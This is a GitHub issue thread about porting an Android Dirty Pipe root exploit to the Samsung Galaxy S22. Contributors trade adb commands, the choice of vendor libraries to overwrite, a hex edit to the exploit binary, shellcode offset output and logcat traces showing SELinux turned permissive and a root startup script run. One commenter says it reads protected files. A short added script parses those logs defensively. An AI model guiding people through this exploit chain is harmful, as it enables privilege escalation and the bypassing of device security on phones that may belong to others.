S22 #3

Open
oakieville opened this issue Mar 25, 2022 · 158 comments

@oakieville

Could this same method work on the S22? I assume it would require mymod.ko to be built in the S22 kernel source, but can it work?

@polygraphene
Owner

Basically, it should work with a similar procedure.
It needs some modifications, like:

  1. Fix function offset of libc++.so
  2. Choose proper library file to overwrite
  3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

@oakieville
Author

I'm interested in trying it. I have the S22 kernel source as well as the firmware to extract libc++; however, I would need a good deal of guidance in this.

@oakieville
Author

If we could chat on Telegram or WhatsApp, that would be great.

@oakieville
Author

if possible contact me please oakieville209@gmail.com

@oakieville
Author

s22 libc++.so

000403e1 w DF .text 00000030 Base std::__1::basic_streambuf<char, std::__1::char_traits<char> >::basic_streambuf()
000403e1 w DF .text 00000030 Base std::__1::basic_streambuf<char, std::__1::char_traits<char> >::basic_streambuf()

@polygraphene
Owner

Our schedules might not match for chat.

I added auto-detection of the offset for libc++.so, so the remaining issues are the kernel module and libstagefright_soft_mp3dec.so.
The kernel module may run on other devices without modification. Try it to check if it works.

The target vendor lib (on Pixel 6, libstagefright_soft_mp3dec.so) must have byte 0x57 at offset 0x1000, like the following:

$ xxd libstagefright_soft_mp3dec.so|grep 01000:
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__

If you can get the firmware image for the device, extract vendor.img on a PC and find a proper lib with the following command:

$ for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
(snip)
vendor/lib/libstagefright_soft_hevcdec.so
vendor/lib/libstagefright_soft_mp3dec.so
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__
vendor/lib/libstagefright_soft_mpeg2dec.so
vendor/lib/libstagefright_soft_mpeg4dec.so
(snip)

If you can't find a proper lib, we should find other methods.

@polygraphene
Owner

After finding the lib:

adb shell /data/local/tmp/dirtypipe-android -f (Found lib path)

You can also use /vendor/lib64/*.so, but a 32-bit lib should have a small impact on the system.

If you succeed, adb logcat looks like:

03-27 15:30:08.230     1     1 W /system/bin/init: type=1107 audit(0.0:27746): uid=0 auid=4294967295 ses=4294967295 subj=u:r:init:s0 msg='avc: denied { set } for property=a pid=12648 uid=2000 gid=2000 scontext=u:r:shell:s0 tcontext=u:object_r:default_prop:s0 tclass=property_service permissive=0'
03-27 15:30:08.240 12648 12648 W libc    : Unable to set property "a" to "a": error code: 0x18
01-01 09:00:00.1023 12649 12649 I stage2  : pipe_size: 65536
01-01 09:00:00.1023 12649 12649 I stage2  : Wait for child pid=12653
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27747): avc: denied { read } for path="/dev/.dirtypipe-0057" dev="tmpfs" ino=1223 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27748): avc: denied { read } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27749): avc: denied { write } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.343 12653 12653 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27750): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27751): avc: denied { execute } for name="startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27752): avc: denied { read open } for path="/data/local/tmp/startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
01-01 09:00:00.1023 12649 12649 I stage2  : waitid returned with 0. Restore files.
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28232): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28233): avc: denied { getattr } for path="/data/local/tmp/reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=fifo_file permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28234): avc: denied { dac_override } for capability=1 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:vendor_modprobe:s0 tclass=capability permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28235): avc: denied { write } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28236): avc: denied { remove_name } for name="reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
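
A defender's reading of the log above, as an added example that is not part of the thread or the project: every `vendor_modprobe` record carries `permissive=1`, meaning SELinux logged the denial but did not enforce it. The script below parses AVC records from logcat and groups the unenforced ones by source domain; the sample lines are copied from the logcat output quoted above, and the function names are this example's own.

```python
import re
from collections import defaultdict

# Lines copied from the logcat output quoted in the comment above.
SAMPLE_LOGCAT = """\
03-27 15:30:08.230     1     1 W /system/bin/init: type=1107 audit(0.0:27746): uid=0 auid=4294967295 ses=4294967295 subj=u:r:init:s0 msg='avc: denied { set } for property=a pid=12648 uid=2000 gid=2000 scontext=u:r:shell:s0 tcontext=u:object_r:default_prop:s0 tclass=property_service permissive=0'
03-27 15:30:08.240 12648 12648 W libc    : Unable to set property "a" to "a": error code: 0x18
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27747): avc: denied { read } for path="/dev/.dirtypipe-0057" dev="tmpfs" ino=1223 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27752): avc: denied { read open } for path="/data/local/tmp/startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28234): avc: denied { dac_override } for capability=1 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:vendor_modprobe:s0 tclass=capability permissive=1
"""

# "avc: denied { perm ... } for key=value ..." as emitted by the kernel audit log.
AVC_RE = re.compile(r"avc:\s+denied\s+\{\s*(?P<perms>[^}]*?)\s*\}\s+for\s+(?P<fields>.*)$")
# key=value pairs; values may be double-quoted (paths, names).
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def _selinux_type(context):
    """Return the type field of a context such as u:r:vendor_modprobe:s0."""
    parts = context.split(":")
    return parts[2] if len(parts) > 2 else context


def parse_avc(line):
    """Parse one logcat line; return a dict for AVC denials, else None."""
    match = AVC_RE.search(line)
    if not match:
        return None
    # Strip quotes, including the trailing ' of init's msg='...' wrapper.
    kv = {k: v.strip("\"'") for k, v in KV_RE.findall(match.group("fields"))}
    if "scontext" not in kv or "permissive" not in kv:
        return None
    return {
        "perms": match.group("perms").split(),
        "domain": _selinux_type(kv["scontext"]),
        "target": _selinux_type(kv.get("tcontext", "")),
        "tclass": kv.get("tclass", ""),
        # permissive=1: the access was logged but allowed to proceed.
        "permissive": kv["permissive"] == "1",
        "object": kv.get("path") or kv.get("name")
                  or kv.get("property") or kv.get("capability"),
    }


def not_enforced(lines):
    """Group AVC records logged with permissive=1 by source domain.

    Production (user) Android builds are expected to run every domain in
    enforcing mode, so any entry here deserves investigation.
    """
    hits = defaultdict(list)
    for line in lines:
        record = parse_avc(line)
        if record and record["permissive"]:
            hits[record["domain"]].append(record)
    return dict(hits)


def report(lines):
    """Return one summary string per domain that logged unenforced denials."""
    out = []
    for domain, records in sorted(not_enforced(lines).items()):
        accesses = sorted({
            "{}:{} on {}".format(r["tclass"], ",".join(r["perms"]), r["object"])
            for r in records
        })
        out.append("{}: {} unenforced denial(s): {}".format(
            domain, len(records), "; ".join(accesses)))
    return out


if __name__ == "__main__":
    for line in report(SAMPLE_LOGCAT.splitlines()):
        print(line)
```
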

@elliwigy

Not sure if it matters but you can run those commands from shell/on the device itself.. If you run:

xxd libstagefright_soft_mp3dec.so|grep 01000
00001000: 695f 6d65 6d63 7079 3400 5f5f 6165 6162  i_memcpy4.__aeab
00010000: 1400 5ae3 f2fa ffda 1500 5ae3 f7fa ff1a  ..Z.......Z.....

and furthermore the other code returns a long list which I will provide shortly.. are we looking for something that contains this exactly:

00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f _aeabi_memcpy.__

@oakieville
Author

Hey elliwigy, how are you doing? OK, I will check as you instructed above. I do see that libstagefright_soft_mp3dec.so on the S22 doesn't seem to exist; there are other libstagefright libs there, however I have not yet checked the offset. I will do so later today or tomorrow.

@elliwigy

These are all the ones it finds:

for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
vendor/lib/libvndfwk_detect_jni.qti.so
vendor/lib/libvndfwk_detect_jni.qti_vendor.so
vendor/lib/libvorbisidec.so
vendor/lib/libvpphcp.so
vendor/lib/libvpphvx.so
vendor/lib/libvppimmotion.so
vendor/lib/libvpx.so
vendor/lib/libwpa_client.so
vendor/lib/libwqe.so
vendor/lib/libwsmd_functions.so
vendor/lib/libxml.so
vendor/lib/libxtadapter.so
vendor/lib/libzoomroi.samsung.so
vendor/lib/qti.video.utils.videobufferlayout.so
vendor/lib/sensors.flicker.so
vendor/lib/sensors.grip.so
vendor/lib/sensors.ssc.so
vendor/lib/shared-file-region-aidl-cpp.so
vendor/lib/unihal_cutils@2.1.so
vendor/lib/unihal_main@2.1.so
vendor/lib/unihal_uniplugin@1.0.so
00001000: 5f6c 696e 6b00 6765 745f 706c 7567 696e  _link.get_plugin
vendor/lib/uwb_uci.helios.so
vendor/lib/vendor.display.color@1.0.so
vendor/lib/vendor.display.color@1.1.so
vendor/lib/vendor.display.color@1.2.so
vendor/lib/vendor.display.color@1.3.so
vendor/lib/vendor.display.color@1.4.so
vendor/lib/vendor.display.color@1.5.so
vendor/lib/vendor.display.color@1.6.so
vendor/lib/vendor.display.color@1.7.so
vendor/lib/vendor.display.config@1.0.so
vendor/lib/vendor.display.config@1.1.so
vendor/lib/vendor.display.config@1.10.so
vendor/lib/vendor.display.config@1.11.so
vendor/lib/vendor.display.config@1.2.so
vendor/lib/vendor.display.config@1.3.so
vendor/lib/vendor.display.config@1.4.so
vendor/lib/vendor.display.config@1.5.so
vendor/lib/vendor.display.config@1.6.so
vendor/lib/vendor.display.config@1.7.so
vendor/lib/vendor.display.config@1.8.so
vendor/lib/vendor.display.config@1.9.so
vendor/lib/vendor.display.config@2.0.so
vendor/lib/vendor.display.postproc@1.0.so
vendor/lib/vendor.qti.data.factory@2.0.so
vendor/lib/vendor.qti.data.factory@2.1.so
vendor/lib/vendor.qti.data.factory@2.2.so
vendor/lib/vendor.qti.data.factory@2.3.so
vendor/lib/vendor.qti.data.factory@2.4.so
vendor/lib/vendor.qti.data.mwqem@1.0.so
vendor/lib/vendor.qti.data.slm@1.0.so
vendor/lib/vendor.qti.diaghal@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.1.so
vendor/lib/vendor.qti.gnss-V1-ndk_platform.so
vendor/lib/vendor.qti.gnss-service.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0-impl.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0-impl.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0.so
vendor/lib/vendor.qti.hardware.automotive.vehicle@1.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.1.so
vendor/lib/vendor.qti.hardware.cacert@1.0.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0.so
vendor/lib/vendor.qti.hardware.camera.device@1.0.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0.so
vendor/lib/vendor.qti.hardware.capabilityconfigstore@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.api@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.constants@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.1.so
vendor/lib/vendor.qti.hardware.data.connection@1.0.so
vendor/lib/vendor.qti.hardware.data.connection@1.1.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.0.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.1.so
vendor/lib/vendor.qti.hardware.data.flow@1.0.so
vendor/lib/vendor.qti.hardware.data.latency@1.0.so
vendor/lib/vendor.qti.hardware.data.lce@1.0.so
vendor/lib/vendor.qti.hardware.data.qmi@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@3.0.so
vendor/lib/vendor.qti.hardware.display.allocator@4.0.so
vendor/lib/vendor.qti.hardware.display.composer@1.0.so
vendor/lib/vendor.qti.hardware.display.composer@2.0.so
vendor/lib/vendor.qti.hardware.display.config-V1-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V2-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V3-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V4-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V5-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.demura@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.1.so
vendor/lib/vendor.qti.hardware.display.mapper@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@3.0.so
vendor/lib/vendor.qti.hardware.display.mapper@4.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.1.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.2.so
vendor/lib/vendor.qti.hardware.dsp@1.0.so
vendor/lib/vendor.qti.hardware.eid@1.0.so
vendor/lib/vendor.qti.hardware.fingerprint@1.0.so
vendor/lib/vendor.qti.hardware.iop@1.0.so
vendor/lib/vendor.qti.hardware.iop@2.0.so
vendor/lib/vendor.qti.hardware.mwqemadapter@1.0.so
vendor/lib/vendor.qti.hardware.pal@1.0.so
vendor/lib/vendor.qti.hardware.perf@2.0.so
vendor/lib/vendor.qti.hardware.perf@2.1.so
vendor/lib/vendor.qti.hardware.perf@2.2.so
vendor/lib/vendor.qti.hardware.perf@2.3.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.0.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.1.so
vendor/lib/vendor.qti.hardware.qccvndhal@1.0.so
vendor/lib/vendor.qti.hardware.qdutils_disp@1.0.so
vendor/lib/vendor.qti.hardware.qseecom@1.0.so
vendor/lib/vendor.qti.hardware.qteeconnector@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.1.so
vendor/lib/vendor.qti.hardware.servicetracker@1.2.so
vendor/lib/vendor.qti.hardware.slmadapter@1.0.so
vendor/lib/vendor.qti.hardware.soter@1.0.so
vendor/lib/vendor.qti.hardware.systemhelper@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.1.so
vendor/lib/vendor.qti.hardware.trustedui@1.2.so
vendor/lib/vendor.qti.hardware.tui_comm@1.0.so
vendor/lib/vendor.qti.hardware.vpp@1.1.so
vendor/lib/vendor.qti.hardware.vpp@1.2.so
vendor/lib/vendor.qti.hardware.vpp@1.3.so
vendor/lib/vendor.qti.hardware.vpp@2.0.so
vendor/lib/vendor.qti.ims.callcapability@1.0.so
vendor/lib/vendor.qti.ims.callinfo@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.1.so
vendor/lib/vendor.qti.ims.rcsconfig@2.0.so
vendor/lib/vendor.qti.ims.rcsconfig@2.1.so
vendor/lib/vendor.qti.latency@2.0.so
vendor/lib/vendor.qti.latency@2.1.so
vendor/lib/vendor.qti.memory.pasrmanager@1.0.so
vendor/lib/vendor.qti.memory.pasrmanager@1.1.so
vendor/lib/vendor.qti.power.pasrmanager@1.0.so
vendor/lib/vendor.qti.qspmhal@1.0.so
vendor/lib/vendor.qti.spu@1.0.so
vendor/lib/vendor.qti.spu@1.1.so
vendor/lib/vendor.qti.spu@2.0.so
vendor/lib/vendor.qti.voiceprint@1.0.so
vendor/lib/vendor.samsung.hardware.audio@1.0.so
vendor/lib/vendor.samsung.hardware.biometrics.face@2.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dp@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dpsink@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.audio@2.0.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0-impl.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0-legacy.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0.so
vendor/lib/vendor.samsung.hardware.health@2.0.so
vendor/lib/vendor.samsung.hardware.hqm@1.0.so
vendor/lib/vendor.samsung.hardware.hyper-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.security.hdcp.wifidisplay-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.snap@1.0.so
vendor/lib/vendor.samsung.hardware.snap@1.1.so
vendor/lib/vendor.samsung.hardware.snap@1.2.so
vendor/lib/vendor.samsung.hardware.thermal@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1-impl.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0.so
vendor/lib/vendor.samsung.hardware.uwb@1.0.so
vendor/lib/vintf-codecsolution-V2-ndk_platform.so

@elliwigy

Hey elliwigy, how are you doing? OK, I will check as you instructed above. I do see that libstagefright_soft_mp3dec.so on s22 doesn't seem to exist; there are other libstagefright libs there, however I have not yet checked the offset. I will do so later today or tomorrow.

It does exist on s22 ultra (SM-S908U) which is what I posted above in /vendor/lib.. not sure why the S22 would be any different?

@polygraphene
Owner

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.

According to your output, we can choose a lib to overwrite.
The following libraries are the best because they are not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

@elliwigy

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.

According to your output, we can choose a lib to overwrite. The following libraries are the best because they are not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat..

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..

You can try it yourself.. from a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

@oakieville
Author

run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s)
startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s)
magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260
Empty space size: 2096 bytes
Run index: 0
Shell code size: 308 0x134 bytes
open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

@oakieville
Author

seems it can't access vendor/lib/* files

@Dog10dogg

Dog10dogg commented Mar 29, 2022

The reason I believe it says the file is not found is because the file "/system/lib/libldacBT_enc.so" does not exist on the Samsungs.

My workaround was (instead of compiling):
Opened the release file "dirtypipe-android" in HxD. Changed both places that contained "/system/lib/libldacBT_enc.so" with "/////system/lib/random.so" (the first "/" and the ".so" have to line up, but you can have as many beginning "/" as you need to null out extra letters in the path name).
Periods before and after the path name are hex "00" and not actually periods.

It'll run but crashes my device almost immediately. It does work tho, as I can use it to copy normally unreadable files and copy them to sdcard.
I believe it is either Knox or the module needs to be tailored to Samsung's kernel.
I would attach the log but it crashes without any log output on adb.
Also the libs between s908u and s908u1 are different. Only two of the possibilities were the same for me.
I used several vendor libs but mostly picked this one, /vendor/lib/libcamxifestriping.so, due to it being the same across both models.

I can use the vendor shell to look at the modules on vendor_dklh/lib/modules (I think?). I did see a file called something like "policy config.ko" but it doesn't look like it lines up with the "mymod.ko". That may be irrelevant tho.

@oakieville
Author

/system/lib/libldacBT_enc.so isn't what it was calling. If you look at the code, it prints "Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so" from the same variable it loads the lib from. I believe, as elliwigy explained, it requires being /vendor/bin/sh to access those libs correctly

lib/libextmediaformatdef.so
00001000: 5f63 726f 7000 6369 7479 2d69 6400 7472 _crop.city-id.tr

maybe this?

@Dog10dogg

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

@elliwigy

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

S22 Ultra does have it:

/system/lib64/libldacBT_enc.so

Of course it's in lib64 not lib dir..

@elliwigy

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

so maybe edit it to use the same so file but in lib64

@polygraphene
Owner

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.
According to your output, we can choose a lib to overwrite. The following libraries are the best because they are not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat..

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..

You can try it yourself.. from a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

That's absolutely right. My bad.
It was unnecessary to extract firmware. Thanks!

@polygraphene
Owner

run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s)
startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s)
magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260
Empty space size: 2096 bytes
Run index: 0
Shell code size: 308 0x134 bytes
open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

There doesn't seem to be "/system/lib/libldacBT_enc.so" as @Dog10dogg said.
Actually "libldacBT_enc.so" can be any file which is not so frequently used by system.
You can choose 64bit "/system/lib64/libldacBT_enc.so". I will add option to change this lib.

stage2_lib (/system/lib/libldacBT_enc.so) and stage2_param_libname (/vendor/lib/libstagefright_soft_mp3dec.so in Pixel 6) are confusing names, but have different roles.
dirtypipe-android (shell process) overwrites stage2_lib to send code to be executed in the init process.
Then the init process overwrites stage2_param_libname so that it has the content of mymod.ko.

@polygraphene
Owner

I would attach the log but it crashes without any log output on adb.

So we should investigate what is causing this crash.
I will upload debug version later.

@oakieville
Author

oakieville commented Mar 29, 2022

Also if I change that to a lib in system lib in the command it doesn't say file not found, or at least didn't when I tried it

@polygraphene
Owner

polygraphene commented Mar 29, 2022

dirtypipe-android-1.0.3-debug1.zip

Try this version.
This version should output logcat like following if stage1 has run successfully:

$ adb shell
oriole:/ $ logcat | grep libc
03-29 21:47:19.811 24886   375 F libc    : Fatal signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x7fad3d4001 in tid 24886 (init), pid 24886 (init)

In addition to logcat, paste output of run.bat here.

If it still reboots, there is something wrong in stage1.

Even if the device doesn't reboot, please manually reboot after launching run.bat, because it won't automatically restore file content. Reboot is required to restore original files.

@polygraphene
Owner

dirtypipe-android-1.0.3-debug2.zip

Try second version if you got "libc : Fatal signal ..." in logcat.
It will generate empty file on /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if file exists
When file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When not exists (failed to call stage2), it says "No such file or directory" (or reboot):

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory

@polygraphene
Owner

dirtypipe-android-1.0.3-debug3.zip
Try third version if you got "Permission denied".

It will produce following logcat if modprobe was successfully launched:

$ adb shell
oriole:/ $ logcat | grep modprobe
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:76): avc: denied { read } for path="/dev/.dirtypipe-0005" dev="tmpfs" ino=1166 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:77): avc: denied { read } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:78): avc: denied { write } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.331  3278  3278 I modprobe-payload: Parsed lib_mod: /vendor/lib/libstagefright_soft_mp3dec.so
03-29 22:25:08.331  3278  3278 I modprobe-payload: Content: 5f 24 03 d5 a8 88 84 d2

If it failed, it might reboot or not output any log.
